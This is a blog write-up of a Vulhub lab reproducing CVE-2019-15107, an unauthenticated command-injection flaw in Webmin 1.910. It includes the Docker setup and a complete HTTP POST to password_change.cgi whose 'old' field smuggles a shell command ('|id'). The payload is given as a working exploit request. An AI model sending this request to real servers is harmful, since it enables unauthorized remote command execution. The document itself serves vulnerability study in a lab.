当前位置:网站首页>Vulhub vulnerability recurrence 73_ Webmin
Vulhub vulnerability recurrence 73_ Webmin
2022-07-06 05:19:00 【Revenge_ scan】
CVE-2019-15107_Webmin Remote command execution vulnerability
Vulnerability Details
Webmin Is a management class Unix System management configuration tool , have Web page . In its find password page , There is a command injection vulnerability that does not require permission , Through this vulnerability, attackers can execute arbitrary system commands .
Reference link :
-https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
- https://www.exploit-db.com/exploits/47230
- https://blog.firosolutions.com/exploits/webmin/
Environment building
shooting range :192.168.4.10_Ubuntu
Execute the following command , start-up webmin 1.910:
#docker-compose up -d
After execution , visit `https://your-ip:10000`, After ignoring the certificate, you can see webmin Login page for .
Loophole recurrence
The data package in the reference link is wrong , After reading the code , Only when sent user The value of the parameter is not known Linux In the case of users ( And the reference link is `user=root`), Will enter the modification `/etc/shadow` The place of , Trigger command injection vulnerability .
Send the following packets , You can execute the command `id`:
```
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
```
边栏推荐
- 你需要知道的 TCP 三次握手
- Nacos TC setup of highly available Seata (02)
- MySQL advanced learning summary 9: create index, delete index, descending index, and hide index
- 2022 half year summary
- UCF(暑期团队赛二)
- The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
- Collection + interview questions
- Some common skills on unity inspector are generally used for editor extension or others
- 关于Unity Inspector上的一些常用技巧,一般用于编辑器扩展或者其他
- In 2022, we must enter the big factory as soon as possible
猜你喜欢
Extension of graph theory
Postman assertion
Vulhub vulnerability recurrence 69_ Tiki Wiki
【torch】|torch. nn. utils. clip_ grad_ norm_
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
js Array 列表 实战使用总结
[leetcode16] the sum of the nearest three numbers (double pointer)
RT thread analysis log system RT_ Kprintf analysis
F12 solve the problem that web pages cannot be copied
【OSPF 和 ISIS 在多路访问网络中对掩码的要求】
随机推荐
UCF(暑期团队赛二)
[classic example] binary tree recursive structure classic topic collection @ binary tree
RT thread analysis log system RT_ Kprintf analysis
Mysql高级篇学习总结9:创建索引、删除索引、降序索引、隐藏索引
Sliding window problem review
C进阶-数据的存储(上)
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
Hyperledger Fabric2. Some basic concepts of X (1)
UCF (2022 summer team competition I)
Zoom and pan image in Photoshop 2022
图数据库ONgDB Release v-1.0.3
Ora-01779: the column corresponding to the non key value saving table cannot be modified
C Advanced - data storage (Part 1)
Figure database ongdb release v-1.0.3
February 12 relativelayout
GAMES202-WebGL中shader的編譯和連接(了解向)
2022半年总结
浅谈镜头滤镜的类型及作用
flutter 实现一个有加载动画的按钮(loadingButton)
GAMES202-WebGL中shader的编译和连接(了解向)